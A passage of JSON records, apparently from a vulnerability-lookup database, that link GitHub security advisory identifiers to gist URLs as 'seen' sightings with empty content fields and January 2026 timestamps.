"GHSA-58Q2-9X27-H2JM", "type": "seen", "source": "https://gist.github.com/alon710/505920f1b05a48d96fd8d53d7e436d13", "content": "", "creation_timestamp": "2026-01-24T22:30:18.000000Z"}, {"uuid": "673a90e5-eaa9-4f3c-84bc-bc7410012d72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4hjh-wcwx-xvwj", "type": "seen", "source": "https://gist.github.com/alon710/e1d32b068f37e737dec11378d0301e14", "content": "", "creation_timestamp": "2026-01-24T22:30:15.000000Z"}, {"uuid": "e8410ea4-86c9-4fb1-8a19-47a945b7b92b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4hjh-wcwx-xvwj", "type": "seen", "source": "https://gist.github.com/alon710/f48c26058f7dd40537145960811698d7", "content": "", "creation_timestamp": "2026-01-24T22:30:12.000000Z"}, {"uuid": "d7400aa1-0cb7-4301-9666-87777c54c310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4hjh-wcwx-xvwj", "type": "seen", "source": "https://gist.github.com/alon710/f0b88d06b1220138a7d504b4409312c3", "content": "", "creation_timestamp": "2026-01-24T22:30:10.000000Z"}, {"uuid": "cbebadfd-8ac7-4fb3-bac8-58f64192793d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4hjh-wcwx-xvwj", "type": "seen", "source": "https://gist.github.com/alon710/02ef43800ace277432d8f2dfe7526cd5", "content": "", "creation_timestamp": "2026-01-24T22:30:07.000000Z"}, {"uuid": "b11fdd04-3ea6-47b2-9cd0-83e5a2c5a4ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54v4-4685-vwrj", "type": "seen", "source": "https://gist.github.com/alon710/3fb5399d94b0c431f655bc66b77ac178", "content": "", "creation_timestamp": "2026-01-24T22:30:01.000000Z"}, {"uuid": "45db3455-3cf5-4e05-a03c-e3ca3b17a3a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qf5v-rp47-55gg", "type": "seen", "source": "https://gist.github.com/alon710/e73027932914f7c8d801134cd6acb90a", "content": "", "creation_timestamp": "2026-01-24T22:33:08.000000Z"}, {"uuid": "51722079-8ee1-4dd0-a993-d1cf60827fe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mp2g-9vg9-f4cg", "type": "seen", "source": "https://gist.github.com/alon710/17e792f99dccd4680c23854163faabed", "content": "", "creation_timestamp": "2026-01-24T22:29:58.000000Z"}, {"uuid": "a4f8d5d7-2de1-4f07-ba31-85324ff8c680", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mp2g-9vg9-f4cg", "type": "seen", "source": "https://gist.github.com/alon710/421db0adf03523b62f28f39e5b40b994", "content": "", "creation_timestamp": "2026-01-24T22:29:56.000000Z"}, {"uuid": "550013dd-96da-4523-97bc-ef9e1335ee76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m3c4-prhw-mrx6", "type": "seen", "source": "https://gist.github.com/alon710/4293f085e0f1888ee5953fb2fe44bcd4", "content": "", "creation_timestamp": "2026-01-24T22:29:38.000000Z"}, {"uuid": "555f716e-dfa3-46e3-9b96-9b7539d49db7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qf5v-rp47-55gg", "type": "seen", "source": "https://gist.github.com/alon710/e50415c28c2ccb8c041fab0a085c5d6b", "content": "", "creation_timestamp": "2026-01-24T22:33:05.000000Z"}, {"uuid": "06e8d4da-228f-4e89-9b84-7cfaacd0271c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9583-h5hc-x8cw", "type": "seen", "source": "https://gist.github.com/alon710/586089f7d848691222e9b9dbd737d149", "content": "", "creation_timestamp": "2026-01-24T22:32:56.000000Z"}, {"uuid": "8d1737e4-e11b-4939-8240-923aa0d816fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9583-h5hc-x8cw", "type": "seen", "source": "https://gist.github.com/alon710/c4a8979a6ef5f0354003627cd1fa958f", "content": "", "creation_timestamp": "2026-01-24T22:32:53.000000Z"}, {"uuid": "70eefdf1-24a6-47a4-bbf4-17c3e21bb8f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vh2x-fw87-4fxq", "type": "seen", "source": "https://gist.github.com/alon710/a0e099f0f98e5d1bd27ea7ec193eb38e", "content": "", "creation_timestamp": "2026-01-24T22:32:51.000000Z"}, {"uuid": "28431b9b-fd96-4066-8ac0-7a8ae4472832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vh2x-fw87-4fxq", "type": "seen", "source": "https://gist.github.com/alon710/09ff893ddee1e17119e9840de11fb1f2", "content": "", "creation_timestamp": "2026-01-24T22:32:48.000000Z"}, {"uuid": "7255443a-8b9f-404d-a196-75e639169b9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2gqc-6j2q-83qp", "type": "seen", "source": "https://gist.github.com/alon710/3e834b5b8cf6f74ecd0e7a9b2a8f19f9", "content": "", "creation_timestamp": "2026-01-24T22:32:40.000000Z"}, {"uuid": "fff5ebf2-b167-41ae-9d69-aa1721494335", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2gqc-6j2q-83qp", "type": "seen", "source": "https://gist.github.com/alon710/122a4775211986e69d62ce1028832f7e", "content": "", "creation_timestamp": "2026-01-24T22:32:37.000000Z"}, {"uuid": "03a99b53-6482-41bb-b798-e670c2167ad1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f2ph-gc9m-q55f", "type": "seen", "source": "https://gist.github.com/alon710/1f4995178b73683a51f11134a0c3470b", "content": "", "creation_timestamp": "2026-01-24T22:32:18.000000Z"}, {"uuid": "73d04baf-4c64-4e15-b0ea-452b8e51ebef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f2ph-gc9m-q55f", "type": "seen", "source": "https://gist.github.com/alon710/bacb8b4742e18a4410eab67514918da6", "content": "", "creation_timestamp": "2026-01-24T22:32:15.000000Z"}, {"uuid": "00135290-c4cf-47b3-856c-21eb721ad2c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cwjm-3f7h-9hwq", "type": "seen", "source": "https://gist.github.com/alon710/c4ecd4cabcf28cde3f1e8599cca82b0e", "content": "", "creation_timestamp": "2026-01-24T22:32:07.000000Z"}, {"uuid": "f90e0e33-a76c-4bab-9aa4-4333fbed0171", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjqq-6r35-w3r8", "type": "seen", "source": "https://gist.github.com/alon710/07a5c8a77f23318f1c603daff4d69d1e", "content": "", "creation_timestamp": "2026-01-24T22:31:57.000000Z"}, {"uuid": "8b625f48-219b-4821-a82f-0e3da8912ceb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjqq-6r35-w3r8", "type": "seen", "source": "https://gist.github.com/alon710/00dd7ac49a6b8af284c990fdc91bce1f", "content": "", "creation_timestamp": "2026-01-24T22:31:54.000000Z"}, {"uuid": "6fb7276a-93d6-47b5-9512-2bde86be28f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cwjm-3f7h-9hwq", "type": "seen", "source": "https://gist.github.com/alon710/4d4187be0deafda3abf565b7c55a10a2", "content": "", "creation_timestamp": "2026-01-24T22:31:49.000000Z"}, {"uuid": "bbe38140-2849-43e7-bbd4-9bccee24c792", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hc4-vh64-cxmj", "type": "seen", "source": "https://gist.github.com/alon710/59e228bfc63cd66f728f971d04c33fa8", "content": "", "creation_timestamp": "2026-01-24T22:31:46.000000Z"}, {"uuid": "da66f8e5-5ee9-4cf4-9949-327825598d43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hc4-vh64-cxmj", "type": "seen", "source": "https://gist.github.com/alon710/6fa8b6f66f11e3daa155e6223eccc16b", "content": "", "creation_timestamp": "2026-01-24T22:31:43.000000Z"}, {"uuid": "bd2a3edb-53f6-402e-bc59-fede644dc4fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWR8-XRPW-9QF5", "type": "seen", "source": "https://gist.github.com/alon710/6fa8b6f66f11e3daa155e6223eccc16b", "content": "", "creation_timestamp": "2026-01-24T22:31:43.000000Z"}, {"uuid": "259d485d-d888-4919-a569-916cc8fcd2ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjqq-6r35-w3r8", "type": "seen", "source": "https://gist.github.com/alon710/003daa99d882979583d343b7f15f6842", "content": "", "creation_timestamp": "2026-01-24T22:31:41.000000Z"}, {"uuid": "5ee46275-4122-4069-8b26-2824f7855eb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjqq-6r35-w3r8", "type": "seen", "source": "https://gist.github.com/alon710/e2d870fea5c04d3617a47015ae71e69e", "content": "", "creation_timestamp": "2026-01-24T22:31:38.000000Z"}, {"uuid": "cee603fa-178d-467b-a489-840f391a591d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44jg-mv3h-wj6g", "type": "seen", "source": "https://gist.github.com/alon710/ad6e3803524ade6af5df3970192eee5d", "content": "", "creation_timestamp": "2026-01-24T22:31:35.000000Z"}, {"uuid": "ace410f0-5a3a-4786-b240-399a3bc0387c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44jg-mv3h-wj6g", "type": "seen", "source": "https://gist.github.com/alon710/6e354ec4eb1a9dba38411073888dc27f", "content": "", "creation_timestamp": "2026-01-24T22:31:33.000000Z"}, {"uuid": "2837c34a-0e8d-4d37-af2d-64b28aad7cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hc4-vh64-cxmj", "type": "seen", "source": "https://gist.github.com/alon710/56337711395ddc5c91027f47c4438497", "content": "", "creation_timestamp": "2026-01-24T22:31:30.000000Z"}, {"uuid": "16d7e203-18dd-4cb8-a8e6-86fc0abe6f72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWR8-XRPW-9QF5", "type": "seen", "source": "https://gist.github.com/alon710/56337711395ddc5c91027f47c4438497", "content": "", "creation_timestamp": "2026-01-24T22:31:30.000000Z"}, {"uuid": "ba11f00c-5917-42f5-811d-cfdd01da9302", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hf5-mc28-xmcv", "type": "seen", "source": "https://gist.github.com/alon710/6285f46c2951ebc9dc1c972e4e0b00b2", "content": "", "creation_timestamp": "2026-01-24T22:33:40.000000Z"}, {"uuid": "71581020-944c-4d2b-af8b-a0a8afbf0fa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hc4-vh64-cxmj", "type": "seen", "source": "https://gist.github.com/alon710/f6a6f6d9b31033de26e50a07b3cf5b90", "content": "", "creation_timestamp": "2026-01-24T22:31:28.000000Z"}, {"uuid": "11128dfc-4e3e-4b82-8d4b-ca0a9cb3b4fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWR8-XRPW-9QF5", "type": "seen", "source": "https://gist.github.com/alon710/f6a6f6d9b31033de26e50a07b3cf5b90", "content": "", "creation_timestamp": "2026-01-24T22:31:28.000000Z"}, {"uuid": "11e61ed9-26be-4e71-8956-ff285d98327f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44jg-mv3h-wj6g", "type": "seen", "source": "https://gist.github.com/alon710/9b9b997d8032789deeb3bfeaeab9a864", "content": "", "creation_timestamp": "2026-01-24T22:31:20.000000Z"}, {"uuid": "2b14ba33-a9c7-4cf6-bbd6-085dc03654da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6pw3-h7xf-x4gp", "type": "seen", "source": "https://gist.github.com/alon710/ca1278aa87a44b0cf4af1ac5fda3f0eb", "content": "", "creation_timestamp": "2026-01-24T22:34:42.000000Z"}, {"uuid": "f211b52a-52e1-4cdd-832d-9e10426a3a68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qf5v-rp47-55gg", "type": "seen", "source": "https://gist.github.com/alon710/8ce957780ad4d5b03284158dd7271032", "content": "", "creation_timestamp": "2026-01-24T22:34:39.000000Z"}, {"uuid": "88ff31e3-d13a-4ecc-bf82-55f32b24d362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qf5v-rp47-55gg", "type": "seen", "source": "https://gist.github.com/alon710/26b1e024052763f2bc2806b7cc2488e8", "content": "", "creation_timestamp": "2026-01-24T22:34:36.000000Z"}, {"uuid": "ad2015b4-1972-4484-8bee-baef72aad14a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3g2f-4rjg-9385", "type": "seen", "source": "https://gist.github.com/alon710/ffc280638893c2f05c9f9b45e44d58f5", "content": "", "creation_timestamp": "2026-01-24T22:34:34.000000Z"}, {"uuid": "5837521b-8223-4d64-a8e2-a7b14dad5d17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3g2f-4rjg-9385", "type": "seen", "source": "https://gist.github.com/alon710/0054467ac2c1437de844b92eaa9a83e4", "content": "", "creation_timestamp": "2026-01-24T22:34:31.000000Z"}, {"uuid": "8966a9a2-c552-4d53-b860-7c33f7088336", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9583-h5hc-x8cw", "type": "seen", "source": "https://gist.github.com/alon710/56e4d17c68ab304b629c747901298725", "content": "", "creation_timestamp": "2026-01-24T22:34:28.000000Z"}, {"uuid": "ad349d80-8843-48ef-8cee-30f9697f542c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9583-h5hc-x8cw", "type": "seen", "source": "https://gist.github.com/alon710/0c40cbf43cb98fa4caa09f60b21ccd89", "content": "", "creation_timestamp": "2026-01-24T22:34:26.000000Z"}, {"uuid": "e8be7897-8265-4277-bbe6-7c02d210c283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-595p-g7xc-c333", "type": "seen", "source": "https://gist.github.com/alon710/b7ae3cd2f96ecb31c1c99b831409de34", "content": "", "creation_timestamp": "2026-01-24T22:34:20.000000Z"}, {"uuid": "764985aa-99f1-4254-b619-c728aadaf88d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcrc-79hj-m3qh", "type": "seen", "source": "https://gist.github.com/alon710/e20ebfb9f770e0a0b0142546c91edb5e", "content": "", "creation_timestamp": "2026-01-24T22:34:18.000000Z"}, {"uuid": "1a1edc3a-0f4a-47dd-b78e-d7f2237c1430", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcrc-79hj-m3qh", "type": "seen", "source": "https://gist.github.com/alon710/448b0b00a78a311665a4c7ed4a14beb0", "content": "", "creation_timestamp": "2026-01-24T22:34:15.000000Z"}, {"uuid": "70f70409-90d6-438d-9cf9-5ee8d2338f75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73RR-HH4G-FPGX", "type": "seen", "source": "https://gist.github.com/alon710/e0b37613a4cf93f10792ccd0710eee80", "content": "", "creation_timestamp": "2026-01-24T22:34:12.000000Z"}, {"uuid": "36fce90c-bc62-4ebe-88ee-4cb579ca4912", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73RR-HH4G-FPGX", "type": "seen", "source": "https://gist.github.com/alon710/371f33f1fb24b0a0bb5c91d7b6407e20", "content": "", "creation_timestamp": "2026-01-24T22:34:10.000000Z"}, {"uuid": "95891e61-3649-43df-bc99-45ddf03b4950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qvr7-7g55-69xj", "type": "seen", "source": "https://gist.github.com/alon710/ef6eb854d2eb9ebb8845eef641b41150", "content": "", "creation_timestamp": "2026-01-24T22:34:02.000000Z"}, {"uuid": "c1eae476-c912-42f0-8df6-26ea5ae6bc3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qvr7-7g55-69xj", "type": "seen", "source": "https://gist.github.com/alon710/6f56f13b46af65ce64dfac246686d5ac", "content": "", "creation_timestamp": "2026-01-24T22:33:59.000000Z"}, {"uuid": "c54a978e-1887-4098-958a-7121c89555eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hf5-mc28-xmcv", "type": "seen", "source": "https://gist.github.com/alon710/7a81d240382c79961449a7dc6262e4ae", "content": "", "creation_timestamp": "2026-01-24T22:33:37.000000Z"}, {"uuid": "b3d211d1-62f3-4411-941f-312dff3c633b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F44-XW83-3PMG", "type": "seen", "source": "https://gist.github.com/alon710/d8fd91f8283e225a106f76c357b7f3dc", "content": "", "creation_timestamp": "2026-01-24T22:35:03.000000Z"}, {"uuid": "619e8f18-15fe-4316-bdb0-85a0fa089a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6pw3-h7xf-x4gp", "type": "seen", "source": "https://gist.github.com/alon710/35a6c0aaf98992e9fb9a182e64035e9e", "content": "", "creation_timestamp": "2026-01-24T22:34:45.000000Z"}, {"uuid": "360baa70-8c14-48fd-bfb6-f1cfaa554867", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pcwc-3fw3-8cqv", "type": "seen", "source": "https://gist.github.com/alon710/e4789edd7505d95c76f39c366fb65712", "content": "", "creation_timestamp": "2026-01-24T22:41:22.000000Z"}, {"uuid": "06f2c6a0-a06c-4c26-8013-159478238e24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hj4w-hm2g-p6w5", "type": "seen", "source": "https://gist.github.com/alon710/85717da89d2462733523c04a8c1a2e50", "content": "", "creation_timestamp": "2026-01-24T22:41:19.000000Z"}, {"uuid": "97c518e0-2517-447d-9111-ebff7c253856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0384", "type": "seen", "source": "https://gist.github.com/alon710/1ebd78b25a55363e86004a46cf589989", "content": "", "creation_timestamp": "2026-01-24T22:41:18.000000Z"}, {"uuid": "469ffcd4-68e6-428c-bf40-130f154050f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9rg3-9pvr-6p27", "type": "seen", "source": "https://gist.github.com/alon710/56583ebe2044916aa1ba9e5064987b6f", "content": "", "creation_timestamp": "2026-01-24T22:42:25.000000Z"}, {"uuid": "630844ba-aa3f-422c-ba4a-3052328b8772", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9c48-w39g-hm26", "type": "seen", "source": "https://gist.github.com/alon710/6433c5ff14089f24fc94915b9eb3de6a", "content": "", "creation_timestamp": "2026-01-24T22:42:15.000000Z"}, {"uuid": "4103b747-284e-41c8-a8ad-bd2f4a1e9578", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4pr-fm98-w9pg", "type": "seen", "source": "https://gist.github.com/alon710/d3d72612ebf7ed7732f8f8e5e9f150de", "content": "", "creation_timestamp": "2026-01-24T22:42:14.000000Z"}, {"uuid": "ef750a94-cc5f-46fc-8480-46b354219c45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RHFX-M35P-FF5J", "type": "seen", "source": "https://gist.github.com/alon710/e314cee8e358e6ec0d405ab91cf15746", "content": "", "creation_timestamp": "2026-01-24T22:42:13.000000Z"}, {"uuid": "dcb019b9-f8df-46c8-a3d4-2571829c8f8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5F29-2333-H9C7", "type": "seen", "source": "https://gist.github.com/alon710/6c405bd0e83138fc5fcab22602f0e56e", "content": "", "creation_timestamp": "2026-01-24T22:42:12.000000Z"}, {"uuid": "2f902fa8-4d40-43d0-8ea7-8652105f0028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ch7p-mpv4-4vg4", "type": "seen", "source": "https://gist.github.com/alon710/09b665ccbc9a4582770dd271d38993ea", "content": "", "creation_timestamp": "2026-01-24T22:42:10.000000Z"}, {"uuid": "99aa539a-345f-4079-937c-e515ca2ddbbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gxxc-m74c-f48x", "type": "seen", "source": "https://gist.github.com/alon710/1f9c5c1b631ce1df5935de9396e1f1ed", "content": "", "creation_timestamp": "2026-01-24T22:41:25.000000Z"}, {"uuid": "09b846d0-ca96-40c8-b634-749ad0f44aaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rvjx-cfjh-5mc9", "type": "seen", "source": "https://gist.github.com/alon710/fa2d5a72e5733840c9c3958327680581", "content": "", "creation_timestamp": "2026-01-24T22:42:09.000000Z"}, {"uuid": "961b3c73-da1c-4dc4-9a26-162943187341", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hmp7-x699-cvhq", "type": "seen", "source": "https://gist.github.com/alon710/1441e69379270f9bfb7d94afbdbaaa0a", "content": "", "creation_timestamp": "2026-01-24T22:42:08.000000Z"}, {"uuid": "e83f4be3-abb0-43ef-80c3-fd34407fb78f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jf52-3f2h-h9j5", "type": "seen", "source": "https://gist.github.com/alon710/1639811d7ced523ecd9f6d855f0e0b2a", "content": "", "creation_timestamp": "2026-01-24T22:42:07.000000Z"}, {"uuid": "62978d15-1ae7-47f2-ab42-7fce4ad52c31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xwh2-742g-w3wp", "type": "seen", "source": "https://gist.github.com/alon710/3ec4611880874cbd3e0f9b8bdb739f2e", "content": "", "creation_timestamp": "2026-01-24T22:42:06.000000Z"}, {"uuid": "019e709d-b4a7-46ca-85cf-7c10e8861372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38jv-5279-wg99", "type": "seen", "source": "https://gist.github.com/alon710/b8a6c9f6b93fcf3d8e0a64ab081c4a03", "content": "", "creation_timestamp": "2026-01-24T22:42:05.000000Z"}, {"uuid": "528818f6-bc7d-4479-88b4-2b6f49e2a494", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w3x5-7c4c-66p9", "type": "seen", "source": "https://gist.github.com/alon710/ded26d0eae932e8e71d4c554e44cda0b", "content": "", "creation_timestamp": "2026-01-24T22:43:40.000000Z"}, {"uuid": "02d0bc30-c949-45d7-bd71-86b5726bafd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-379q-355j-w6rj", "type": "seen", "source": "https://gist.github.com/alon710/7c455b1ed48f6320d405e32190f9755e", "content": "", "creation_timestamp": "2026-01-24T22:42:03.000000Z"}, {"uuid": "fe5c5632-5fee-4ac5-8809-97026164ba73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fg6f-75jq-6523", "type": "seen", "source": "https://gist.github.com/alon710/a80bb31934d4611b4605d3d41bdf4def", "content": "", "creation_timestamp": "2026-01-24T22:42:02.000000Z"}, {"uuid": "fee60161-79bd-41f1-b410-7570091df860", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 